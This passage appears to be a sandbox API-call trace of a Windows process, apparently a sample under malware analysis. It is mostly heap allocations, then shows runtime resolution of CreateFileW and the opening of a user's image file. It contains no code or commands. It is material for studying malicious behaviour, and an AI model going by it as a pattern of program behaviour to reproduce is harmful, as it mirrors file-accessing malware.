hHeap=0x1780000) returned 1 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0094.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0094.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca070 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0094.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0094.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0094.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0094.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0094.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0094.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0094.611] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0094.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0094.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0094.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0094.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0094.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0094.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0094.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0094.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0094.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0094.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0094.614] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0094.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0094.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0094.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0094.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0094.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0094.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.617] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0094.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0094.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0094.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.618] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0094.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0094.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0094.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0094.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0094.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0094.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\OjV9.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\ojv9.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0094.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0094.620] RtlAllocateHeap 